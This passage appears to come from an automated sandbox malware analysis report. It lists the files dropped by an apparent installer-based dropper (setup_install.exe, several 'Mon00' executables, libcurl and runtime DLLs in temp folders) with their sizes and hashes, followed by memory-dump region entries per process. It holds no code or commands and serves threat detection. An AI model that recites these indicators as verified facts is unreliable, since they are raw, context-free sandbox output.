          a4aebd9840e964e71c11e37e07bf148098465db58761e4000e384f2deae641ecaabb62c63fc6c4d1f711eb60f285b86ab23ff3f77a575832bc75e1072b5e113a

        • C:\Users\Admin\AppData\Local\Temp\CabECDE.tmp

          Filesize

          70KB

          MD5

          49aebf8cbd62d92ac215b2923fb1b9f5

          SHA1

          1723be06719828dda65ad804298d0431f6aff976

          SHA256

          b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

          SHA512

          bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

        • C:\Users\Admin\AppData\Local\Temp\is-GNSTJ.tmp\_isetup\_shfoldr.dll

          Filesize

          22KB

          MD5

          92dc6ef532fbb4a5c3201469a5b5eb63

          SHA1

          3e89ff837147c16b4e41c30d6c796374e0b8e62c

          SHA256

          9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

          SHA512

          9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

        • C:\Users\Admin\AppData\Local\Temp\is-GNSTJ.tmp\idp.dll

          Filesize

          216KB

          MD5

          b37377d34c8262a90ff95a9a92b65ed8

          SHA1

          faeef415bd0bc2a08cf9fe1e987007bf28e7218d

          SHA256

          e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f

          SHA512

          69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

        • C:\Users\Admin\AppData\Local\Temp\is-LMKEP.tmp\Mon001dcfc58b0850.tmp

          Filesize

          691KB

          MD5

          9303156631ee2436db23827e27337be4

          SHA1

          018e0d5b6ccf7000e36af30cebeb8adc5667e5fa

          SHA256

          bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4

          SHA512

          9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

        • \Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon003b11682c.exe

          Filesize

          433KB

          MD5

          a98672182143436478fdb3806ef6cd5a

          SHA1

          5d93bb55d9e7915afb11361f42a4c9c6393718b3

          SHA256

          2010cb8b8069ae8e5527526b36f28b78766473b71b67d601351eb361dbef8528

          SHA512

          0d2de593d1e194895833396c49efe194fca56afa3396e6aa41f8a51e961ea4f1ca97697ace0625ea97f5dfe7092b75049c58e582dda122cbc7966cb9a5d18892

        • \Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00806cfb48.exe

          Filesize

          343KB

          MD5

          69143c3e279096813040fa72b0371d4f

          SHA1

          689ee0137e029f58b34e20dab8f3115e3f7f323c

          SHA256

          1567686369bf90337140781d80a6a7f43f5a9ee5f0f6301977b66d794ca1297f

          SHA512

          7dc0a9603ba42b3c03904e479d6288a133c2c4ae5fb5106734d4e8a082f701eb5d2c023d5f66eb617324579e4ae3a704eb21982f958ba0d18c6246a4a151c18e

        • \Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00df41776583.exe

          Filesize

          421KB

          MD5

          5535284a6c2d931c336cb4e67b146eb2

          SHA1

          1c1c64e2fba0d3bcd1a1851ec46a3163cc49dab0

          SHA256

          9793a517c475fe2e4a361f6a6a99bb5dedd5d3a7db1b7ce6cf1f8f93c7f41b75

          SHA512

          4833047de9198a7e92b35f1914c50f20a79778bb822cc282734cc0a95a2f4633dfe3e317ccbcd4fcc81b5f6d2242786d712eeab8e77dc589cbb693680a99767d

        • \Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00f8ffa77fe72688.exe

          Filesize

          1.4MB

          MD5

          ba8541c57dd3aae16584e20effd4c74c

          SHA1

          5a49e309db2f74485db177fd9b69e901e900c97d

          SHA256

          dbc19cdcdf66065ddb1a01488dac2961b7aa1cde6143e8912bf74c829eaa2c6c

          SHA512

          1bdc7461faf32bba7264de0d1f26365ee285de687edef7d957194897fc398145414a63ad5255e6fc5b559e9979d82cf49e8adf4d9d58b86405c921aec027866d

        • \Users\Admin\AppData\Local\Temp\7zS4565B3A6\libcurl.dll

          Filesize

          218KB

          MD5

          d09be1f47fd6b827c81a4812b4f7296f

          SHA1

          028ae3596c0790e6d7f9f2f3c8e9591527d267f7

          SHA256

          0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

          SHA512

          857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

        • \Users\Admin\AppData\Local\Temp\7zS4565B3A6\libcurlpp.dll

          Filesize

          54KB

          MD5

          e6e578373c2e416289a8da55f1dc5e8e

          SHA1

          b601a229b66ec3d19c2369b36216c6f6eb1c063e

          SHA256

          43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

          SHA512

          9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

        • \Users\Admin\AppData\Local\Temp\7zS4565B3A6\libgcc_s_dw2-1.dll

          Filesize

          113KB

          MD5

          9aec524b616618b0d3d00b27b6f51da1

          SHA1

          64264300801a353db324d11738ffed876550e1d3

          SHA256

          59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

          SHA512

          0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

        • \Users\Admin\AppData\Local\Temp\7zS4565B3A6\libstdc++-6.dll

          Filesize

          647KB

          MD5

          5e279950775baae5fea04d2cc4526bcc

          SHA1

          8aef1e10031c3629512c43dd8b0b5d9060878453

          SHA256

          97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

          SHA512

          666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

        • \Users\Admin\AppData\Local\Temp\7zS4565B3A6\libwinpthread-1.dll

          Filesize

          69KB

          MD5

          1e0d62c34ff2e649ebc5c372065732ee

          SHA1

          fcfaa36ba456159b26140a43e80fbd7e9d9af2de

          SHA256

          509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

          SHA512

          3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

        • \Users\Admin\AppData\Local\Temp\7zS4565B3A6\setup_install.exe

          Filesize

          2.1MB

          MD5

          ca649f3a6e34a11e861537b17b01e260

          SHA1

          b7e133dcc4661efd2ede4d078292f900473c9d3c

          SHA256

          606f0d287d8128e3a5b685a5ba659bde37edb9adccff260695cd0c10c6245c9a

          SHA512

          e883e3d059a6ede0ff5d39cf9b679127bc640836ebe54b8460f14c1d75949dc5b01e27e4ed9a0ba461b4cfc2b7f46cf462dc642d5cbd3e4beebfd12ab74c3715

        • memory/300-194-0x0000000000400000-0x0000000000422000-memory.dmp

          Filesize

          136KB

        • memory/300-190-0x0000000000400000-0x0000000000422000-memory.dmp

          Filesize

          136KB

        • memory/300-198-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

          Filesize

          4KB

        • memory/300-196-0x0000000000400000-0x0000000000422000-memory.dmp

          Filesize

          136KB

        • memory/300-192-0x0000000000400000-0x0000000000422000-memory.dmp

          Filesize

          136KB

        • memory/300-215-0x0000000000400000-0x0000000000422000-memory.dmp

          Filesize

          136KB

        • memory/300-199-0x0000000000400000-0x0000000000422000-memory.dmp

          Filesize

          136KB

        • memory/300-210-0x0000000000400000-0x0000000000422000-memory.dmp

          Filesize

          136KB

        • memory/408-151-0x0000000000400000-0x00000000004BD000-memory.dmp

          Filesize

          756KB

        • memory/1272-133-0x0000000001080000-0x00000000010F0000-memory.dmp

          Filesize

          448KB

        • memory/1352-152-0x0000000000400000-0x0000000000414000-memory.dmp

          Filesize

          80KB

        • memory/1352-262-0x0000000000400000-0x0000000000414000-memory.dmp

          Filesize

          80KB

        • memory/1432-263-0x0000000000400000-0x00000000004BD000-memory.dmp

          Filesize

          756KB

        • memory/1564-208-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

          Filesize

          4KB

        • memory/1564-202-0x0000000000400000-0x0000000000422000-memory.dmp

          Filesize

          136KB

        • memory/1564-209-0x0000000000400000-0x0000000000422000-memory.dmp

          Filesize

          136KB

        • memory/1564-214-0x0000000000400000-0x0000000000422000-memory.dmp

          Filesize

          136KB

        • memory/1564-212-0x0000000000400000-0x0000000000422000-memory.dmp

          Filesize

          136KB

        • memory/1564-206-0x0000000000400000-0x0000000000422000-memory.dmp

          Filesize

          136KB

        • memory/1564-204-0x0000000000400000-0x0000000000422000-memory.dmp

          Filesize

          136KB

        • memory/1672-240-0x0000000000400000-0x00000000007F3000-memory.dmp

          Filesize

          3.9MB

        • memory/1724-140-0x00000000003A0000-0x00000000003BA000-memory.dmp

          Filesize

          104KB

        • memory/1724-156-0x0000000000360000-0x0000000000366000-memory.dmp

          Filesize

          24KB

        • memory/2040-239-0x0000000000400000-0x0000000000787000-memory.dmp

          Filesize

          3.5MB

        • memory/2680-132-0x0000000000CC0000-0x0000000000D32000-memory.dmp

          Filesize

          456KB

        • memory/2696-270-0x00000000027F0000-0x00000000029E0000-memory.dmp

          Filesize

          1.9MB

        • memory/2696-238-0x00000000027F0000-0x00000000029E0000-memory.dmp

          Filesize

          1.9MB

        • memory/2704-129-0x0000000000400000-0x0000000000414000-memory.dmp

          Filesize

          80KB

        • memory/2704-154-0x0000000000400000-0x0000000000414000-memory.dmp

          Filesize

          80KB

        • memory/2856-71-0x000000006B440000-0x000000006B4CF000-memory.dmp

          Filesize

          572KB

        • memory/2856-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp

          Filesize

          1.5MB

        • memory/2856-182-0x0000000064940000-0x0000000064959000-memory.dmp

          Filesize

          100KB

        • memory/2856-189-0x000000006FE40000-0x000000006FFC6000-memory.dmp

          Filesize

          1.5MB

        • memory/2856-185-0x000000006EB40000-0x000000006EB63000-memory.dmp

          Filesize

          140KB

        • memory/2856-58-0x000000006B280000-0x000000006B2A6000-memory.dmp

          Filesize

          152KB

        • memory/2856-61-0x000000006B440000-0x000000006B4CF000-memory.dmp

          Filesize

          572KB

        • memory/2856-69-0x000000006FE40000-0x000000006FFC6000-memory.dmp

          Filesize

          1.5MB

        • memory/2856-70-0x000000006B440000-0x000000006B4CF000-memory.dmp

          Filesize

          572KB

        • memory/2856-80-0x0000000064940000-0x0000000064959000-memory.dmp

          Filesize

          100KB

        • memory/2856-72-0x000000006B440000-0x000000006B4CF000-memory.dmp

          Filesize

          572KB

        • memory/2856-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp

          Filesize

          1.5MB

        • memory/2856-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp

          Filesize

          1.5MB

        • memory/2856-181-0x0000000000400000-0x000000000051C000-memory.dmp

          Filesize

          1.1MB

        • memory/2856-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp

          Filesize

          1.5MB

        • memory/2856-79-0x0000000064941000-0x000000006494F000-memory.dmp

          Filesize

          56KB

        • memory/2856-78-0x000000006B280000-0x000000006B2A6000-memory.dmp

          Filesize

          152KB

        • memory/2856-77-0x000000006B280000-0x000000006B2A6000-memory.dmp

          Filesize

          152KB

        • memory/2856-187-0x000000006B280000-0x000000006B2A6000-memory.dmp

          Filesize

          152KB

        • memory/2856-188-0x000000006B440000-0x000000006B4CF000-memory.dmp

          Filesize

          572KB

        • memory/2936-135-0x0000000001180000-0x0000000001188000-memory.dmp

          Filesize

          32KB

        • memory/2956-234-0x0000000002E20000-0x0000000002EB2000-memory.dmp

          Filesize

          584KB

        • memory/2956-237-0x0000000002E20000-0x0000000002EB2000-memory.dmp

          Filesize

          584KB

        • memory/2956-225-0x0000000002D70000-0x0000000002E15000-memory.dmp

          Filesize

          660KB

        • memory/2956-180-0x00000000027F0000-0x000000000293C000-memory.dmp

          Filesize

          1.3MB

        • memory/2956-264-0x00000000027F0000-0x000000000293C000-memory.dmp

          Filesize

          1.3MB

        • memory/2980-241-0x0000000000400000-0x00000000007A0000-memory.dmp

          Filesize

          3.6MB